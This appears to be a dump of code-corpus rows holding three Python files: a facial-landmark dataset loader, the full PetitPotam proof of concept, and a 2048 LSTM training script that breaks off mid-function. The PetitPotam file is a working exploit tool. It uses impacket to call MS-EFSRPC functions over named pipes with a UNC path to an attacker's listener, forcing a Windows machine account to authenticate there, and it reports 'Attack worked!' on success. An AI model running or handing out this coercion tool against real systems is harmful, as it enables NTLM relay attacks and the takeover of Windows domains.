- max_stars_count: 38 (2021-05-10T01:22:44.000Z to 2022-03-30T06:54:39.000Z) · max_issues_count: 7 (2021-06-01T06:39:47.000Z to 2022-03-16T05:43:50.000Z) · max_forks_count: 14 (2021-05-10T01:22:46.000Z to 2022-03-30T06:54:42.000Z)
- content (after the filtered:* passes):
import sys
sys.path.append('..')
from torch.utils.data import DataLoader
if __name__ == '__main__':
file_list = './data/test_data/list.txt'
wlfwdataset = WLFWDatasets(file_list)
dataloader = DataLoader(wlfwdataset, batch_size=256, shuffle=True, num_workers=0, drop_last=False)
for img, landmark, attribute, euler_angle in dataloader:
print("img shape", img.shape)
print("landmark size", landmark.size())
print("attrbute size", attribute)
print("euler_angle", euler_angle.size())
avg_line_length: 33.705882 · max_line_length: 166 · alphanum_fraction: 0.601745

original_content:
import numpy as np
import cv2
import random  # needed by random_noise()
import sys
import torch
sys.path.append('..')
from skimage.transform import resize  # needed by scale()
from torch.utils import data
from torch.utils.data import DataLoader
def flip(img, annotation):
# parse
img = np.fliplr(img).copy()
h, w = img.shape[:2]
x_min, y_min, x_max, y_max = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
bbox = np.array([w - x_max, y_min, w - x_min, y_max])
for i in range(len(landmark_x)):
landmark_x[i] = w - landmark_x[i]
new_annotation = list()
new_annotation.append(x_min)
new_annotation.append(y_min)
new_annotation.append(x_max)
new_annotation.append(y_max)
for i in range(len(landmark_x)):
new_annotation.append(landmark_x[i])
new_annotation.append(landmark_y[i])
return img, new_annotation
def channel_shuffle(img, annotation):
if (img.shape[2] == 3):
ch_arr = [0, 1, 2]
np.random.shuffle(ch_arr)
img = img[..., ch_arr]
return img, annotation
def random_noise(img, annotation, limit=[0, 0.2], p=0.5):
if random.random() < p:
H, W = img.shape[:2]
noise = np.random.uniform(limit[0], limit[1], size=(H, W)) * 255
img = img + noise[:, :, np.newaxis] * np.array([1, 1, 1])
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_brightness(img, annotation, brightness=0.3):
alpha = 1 + np.random.uniform(-brightness, brightness)
    img = alpha * img  # "image" was undefined here; scale the input image
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_contrast(img, annotation, contrast=0.3):
coef = np.array([[[0.114, 0.587, 0.299]]]) # rgb to gray (YCbCr)
alpha = 1.0 + np.random.uniform(-contrast, contrast)
gray = img * coef
gray = (3.0 * (1.0 - alpha) / gray.size) * np.sum(gray)
img = alpha * img + gray
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_saturation(img, annotation, saturation=0.5):
    coef = np.array([[[0.299, 0.587, 0.114]]])  # "nd" was undefined; use numpy
alpha = np.random.uniform(-saturation, saturation)
gray = img * coef
gray = np.sum(gray, axis=2, keepdims=True)
img = alpha * img + (1.0 - alpha) * gray
img = np.clip(img, 0, 255).astype(np.uint8)
return img, annotation
def random_hue(image, annotation, hue=0.5):
h = int(np.random.uniform(-hue, hue) * 180)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
hsv[:, :, 0] = (hsv[:, :, 0].astype(int) + h) % 180
image = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return image, annotation
def scale(img, annotation):
f_xy = np.random.uniform(-0.4, 0.8)
origin_h, origin_w = img.shape[:2]
bbox = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
h, w = int(origin_h * f_xy), int(origin_w * f_xy)
image = resize(img, (h, w), preserve_range=True, anti_aliasing=True, mode='constant').astype(np.uint8)
new_annotation = list()
for i in range(len(bbox)):
bbox[i] = bbox[i] * f_xy
new_annotation.append(bbox[i])
for i in range(len(landmark_x)):
landmark_x[i] = landmark_x[i] * f_xy
landmark_y[i] = landmark_y[i] * f_xy
new_annotation.append(landmark_x[i])
new_annotation.append(landmark_y[i])
return image, new_annotation
def rotate(img, annotation, alpha=30):
bbox = annotation[0:4]
landmark_x = annotation[4::2]
landmark_y = annotation[4 + 1::2]
center = ((bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2)
rot_mat = cv2.getRotationMatrix2D(center, alpha, 1)
img_rotated_by_alpha = cv2.warpAffine(img, rot_mat, (img.shape[1], img.shape[0]))
point_x = [bbox[0], bbox[2], bbox[0], bbox[2]]
point_y = [bbox[1], bbox[3], bbox[3], bbox[1]]
new_point_x = list()
new_point_y = list()
for (x, y) in zip(landmark_x, landmark_y):
new_point_x.append(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2])
new_point_y.append(rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2])
new_annotation = list()
new_annotation.append(min(new_point_x))
new_annotation.append(min(new_point_y))
new_annotation.append(max(new_point_x))
new_annotation.append(max(new_point_y))
for (x, y) in zip(landmark_x, landmark_y):
new_annotation.append(rot_mat[0][0] * x + rot_mat[0][1] * y + rot_mat[0][2])
new_annotation.append(rot_mat[1][0] * x + rot_mat[1][1] * y + rot_mat[1][2])
return img_rotated_by_alpha, new_annotation
def generate_FT(image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
f = np.fft.fft2(image)
fshift = np.fft.fftshift(f)
fimg = np.log(np.abs(fshift) + 1)
maxx = -1
minn = 100000
for i in range(len(fimg)):
if maxx < max(fimg[i]):
maxx = max(fimg[i])
if minn > min(fimg[i]):
minn = min(fimg[i])
fimg = (fimg - minn + 1) / (maxx - minn + 1)
return fimg
def draw_labelmap(img, pt, sigma=1, type='Gaussian'):
# Draw a 2D gaussian
# Adopted from https://github.com/anewell/pose-hg-train/blob/master/src/pypose/draw.py
# Check that any part of the gaussian is in-bounds
ul = [int(int(pt[0]) - 3 * sigma), int(int(pt[1]) - 3 * sigma)]
br = [int(int(pt[0]) + 3 * sigma + 1), int(int(pt[1]) + 3 * sigma + 1)]
if (ul[0] >= img.shape[1] or ul[1] >= img.shape[0] or
br[0] < 0 or br[1] < 0):
# If not, just return the image as is
        return img  # to_torch() is not defined in this file; return the array unchanged
# Generate gaussian
size = 6 * sigma + 1
x = np.arange(0, size, 1, float)
y = x[:, np.newaxis]
x0 = y0 = size // 2
# The gaussian is not normalized, we want the center value to equal 1
if type == 'Gaussian':
g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))
elif type == 'Cauchy':
g = sigma / (((x - x0) ** 2 + (y - y0) ** 2 + sigma ** 2) ** 1.5)
# Usable gaussian range
g_x = max(0, -ul[0]), min(br[0], img.shape[1]) - ul[0]
g_y = max(0, -ul[1]), min(br[1], img.shape[0]) - ul[1]
# Image range
img_x = max(0, ul[0]), min(br[0], img.shape[1])
img_y = max(0, ul[1]), min(br[1], img.shape[0])
img[img_y[0]:img_y[1], img_x[0]:img_x[1]] = g[g_y[0]:g_y[1], g_x[0]:g_x[1]]
return img
class WLFWDatasets(data.Dataset):
def __init__(self, file_list, transforms=None):
self.line = None
self.lm_number = 98
self.img_size = 96
self.ft_size = self.img_size // 2
self.hm_size = self.img_size // 2
self.transforms = transforms
with open(file_list, 'r') as f:
self.lines = f.readlines()
def __getitem__(self, index):
self.line = self.lines[index].strip()
jpg_idx = self.line.find('png')
line_data = [self.line[:jpg_idx + 3]]
line_data.extend(self.line[jpg_idx + 4:].split())
self.line = line_data
self.img = cv2.imread(self.line[0])
# generate ft
# self.ft_img = generate_FT(self.img)
# self.ft_img = cv2.resize(self.ft_img, (self.ft_size, self.ft_size))
# self.ft_img = torch.from_numpy(self.ft_img).float()
# self.ft_img = torch.unsqueeze(self.ft_img, 0)
self.landmark = np.asarray(self.line[1:197], dtype=np.float32)
# generate heatmap
# self.heatmaps = np.zeros((self.lm_number, self.img_size, self.img_size))
# for idx in range(self.lm_number):
# self.heatmaps[idx, :, :] = draw_labelmap(self.heatmaps[idx, :, :], (self.landmark[idx * 2] * self.img_size, self.landmark[idx * 2 + 1] * self.img_size))
# self.heatmap = cv2.resize(self.heatmap, (self.hm_size, self.hm_size))
# self.heatmap = (self.heatmap * 255).astype(np.uint8)
# with open("heatmap.txt", "w") as f:
# for i in range(self.hm_size):
# str_ = ','.join(str(s) for s in self.heatmap[i, :])
# f.write(str_ + '\n')
# cv2.imwrite('heatmap.jpg', self.heatmap)
if self.transforms:
self.img = self.transforms(self.img)
return self.img, self.landmark
def __len__(self):
return len(self.lines)
if __name__ == '__main__':
file_list = './data/test_data/list.txt'
wlfwdataset = WLFWDatasets(file_list)
dataloader = DataLoader(wlfwdataset, batch_size=256, shuffle=True, num_workers=0, drop_last=False)
for img, landmark, attribute, euler_angle in dataloader:
print("img shape", img.shape)
print("landmark size", landmark.size())
print("attrbute size", attribute)
print("euler_angle", euler_angle.size())
filtered: remove_non_ascii 0 · remove_decorators 0 · remove_async 0 · remove_classes 1,868 · remove_generators 0 · remove_function_no_docstring 5,836 · remove_class_no_docstring 0 · remove_unused_imports -16 · remove_delete_markers 365
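The augmentation helpers in this row's file all share one annotation convention: a flat list `[x_min, y_min, x_max, y_max, lm0_x, lm0_y, lm1_x, lm1_y, ...]`, which is why they slice with `annotation[4::2]` and `annotation[4 + 1::2]`. A small sketch of `flip()` on made-up data, assuming it runs alongside the functions in dataset/datasets.py:

```python
# Dummy-data sketch of the annotation layout expected by flip()/scale()/rotate();
# the image and annotation values below are made up, not from the WLFW list file.
import numpy as np

img = np.zeros((96, 96, 3), dtype=np.uint8)
annotation = [10, 12, 80, 90,          # x_min, y_min, x_max, y_max
              20.0, 30.0, 60.0, 40.0]  # two landmarks as (x, y) pairs

flipped_img, flipped_ann = flip(img, annotation)

print(flipped_ann[4::2])  # landmark x's mirrored around the image width (96)
print(flipped_ann[5::2])  # landmark y's unchanged
```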
Row 4
- hexsha: 30737425867bb55a2af14436ac1b6d6839ca34e3 · size: 16,368 · ext: py · lang: Python
- path: modules/exploit/use/petitpotam.py · repo: astar-security/MaeGeri @ b28b37fe1cb8c4f650b8a4c9019636c540262fda · licenses: ["Apache-2.0"] (identical across the stars, issues and forks column groups)
- max_stars_count / max_issues_count / max_forks_count and their event datetimes: null
- content (after the filtered:* passes):
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
################################################################################
# STRUCTURES
################################################################################
################################################################################
# RPC CALLS
################################################################################
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
if __name__ == '__main__':
main()
avg_line_length: 36.454343 · max_line_length: 243 · alphanum_fraction: 0.574047

original_content:
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
('Type', DWORD),
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_HASH_BLOB),
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_CERTIFICATE_BLOB),
)
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
('Cert', DWORD),
('Users', ENCRYPTION_CERTIFICATE_HASH),
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
structure = (
('Type', DWORD),
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
('Certif', ENCRYPTION_CERTIFICATE),
('Blob', EFS_RPC_BLOB),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
('fileName', WSTR),
('Flag', ULONG),
)
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
('hContext', EXIMPORT_CONTEXT_HANDLE),
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
structure = (
('FileName', WSTR),
)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDecryptFileSrv(NDRCALL):
opnum = 5
structure = (
('FileName', WSTR),
('Flag', ULONG),
)
class EfsRpcDecryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryUsersOnFile(NDRCALL):
opnum = 6
structure = (
('FileName', WSTR),
)
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryRecoveryAgents(NDRCALL):
opnum = 7
structure = (
('FileName', WSTR),
)
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcRemoveUsersFromFile(NDRCALL):
opnum = 8
structure = (
('FileName', WSTR),
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
)
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFile(NDRCALL):
opnum = 9
structure = (
('FileName', WSTR),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
)
class EfsRpcAddUsersToFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfo(NDRCALL):
opnum = 12
structure = (
('FileName', WSTR),
('infoClass', DWORD),
)
class EfsRpcFileKeyInfoResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
opnum = 13
structure = (
('SrcFileName', WSTR),
('DestFileName', WSTR),
('dwCreationDisposition', DWORD),
('dwAttributes', DWORD),
('RelativeSD', EFS_RPC_BLOB),
('bInheritHandle', BOOL),
)
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFileEx(NDRCALL):
opnum = 15
structure = (
('dwFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('dwAttributes', DWORD),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
)
class EfsRpcAddUsersToFileExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfoEx(NDRCALL):
opnum = 16
structure = (
('dwFileKeyInfoFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('InfoClass', DWORD),
)
class EfsRpcFileKeyInfoExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
opnum = 18
structure = (
('FileName', WSTR),
)
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
opnum = 19
structure = (
('FileName', WSTR),
('OldEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
)
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileExSrv(NDRCALL):
opnum = 21
structure = (
('FileName', WSTR),
('ProtectorDescriptor', WSTR),
('Flags', ULONG),
)
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
class CoerceAuth():
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
if targetIp:
rpctransport.setRemoteHost(targetIp)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_type(RPC_C_AUTHN_WINNT)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Connected!")
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
print("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
sys.exit()
if str(e).find('rpc_s_access_denied') >= 0:
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
print('[+] OK! Using unpatched function!')
print("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
pass
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
def main():
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
parser.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass'], default='lsarpc', help='Named pipe to use (default: lsarpc)')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
else:
lmhash = ''
nthash = ''
print(show_banner)
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
from getpass import getpass
options.password = getpass("Password:")
plop = CoerceAuth()
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=options.pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
plop.EfsRpcOpenFileRaw(dce, options.listener)
dce.disconnect()
sys.exit()
if __name__ == '__main__':
main()
filtered: remove_non_ascii 0 · remove_decorators 0 · remove_async 0 · remove_classes 9,176 · remove_generators 0 · remove_function_no_docstring 2,669 · remove_class_no_docstring 0 · remove_unused_imports 181 · remove_delete_markers 1,175
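For orientation only: `OPNUMS` in this row's file maps each implemented MS-EFSRPC operation number to its `(request, response)` NDRCALL pair, while the coercion path itself only ever builds `EfsRpcOpenFileRaw` and, as a fallback, `EfsRpcEncryptFileSrv`. A harmless introspection sketch, assuming it is run in the same module; nothing is sent over the network:

```python
# Introspection only: list which EFSRPC opnums this module defines structures for.
for opnum, (request_cls, response_cls) in sorted(OPNUMS.items()):
    print(f"opnum {opnum:2d}: {request_cls.__name__} -> {response_cls.__name__}")
```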
Row 5
- hexsha: 2d3ca8371c21a92681fe90abff723c44bebc3c0d · size: 3,045 · ext: py · lang: Python
- path: game2048/RNN_training.py · repo: fuuuyuuu/2048-api @ d96aa0bc7099e8ce7b792ec2b1051a44b4325eec · licenses: ["Apache-2.0"] (identical across the stars, issues and forks column groups)
- max_stars_count / max_issues_count / max_forks_count and their event datetimes: null
- content (after the filtered:* passes):
import torchvision.transforms as transforms
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
if __name__ == '__main__':
main()
avg_line_length: 31.71875 · max_line_length: 110 · alphanum_fraction: 0.587521

original_content:
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
def DataLoad():
# board_data loading with a batche size
train_data = data_load(data_root = 'Train.csv', data_tensor = transforms.Compose([transforms.ToTensor()]))
X_train = torch.utils.data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
# test_data = data_load(data_root='Test.csv', data_tensor=transforms.Compose([transforms.ToTensor()]))
# X_test = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
return X_train
class RNN(nn.Module):
def __init__(self):
super(RNN, self).__init__()
self.my_rnn = nn.LSTM(
input_size=INPUT_SIZE,
hidden_size=512,
num_layers=4,
batch_first=True
)
self.out = nn.Linear(512, 4)
def forward(self, x):
r_out, (h_n, h_c) = self.my_rnn(x,None)
out = self.out(r_out[:, -1 ,:])
return out
def main():
global LR;
rnn_training = RNN()
train_data = DataLoad()
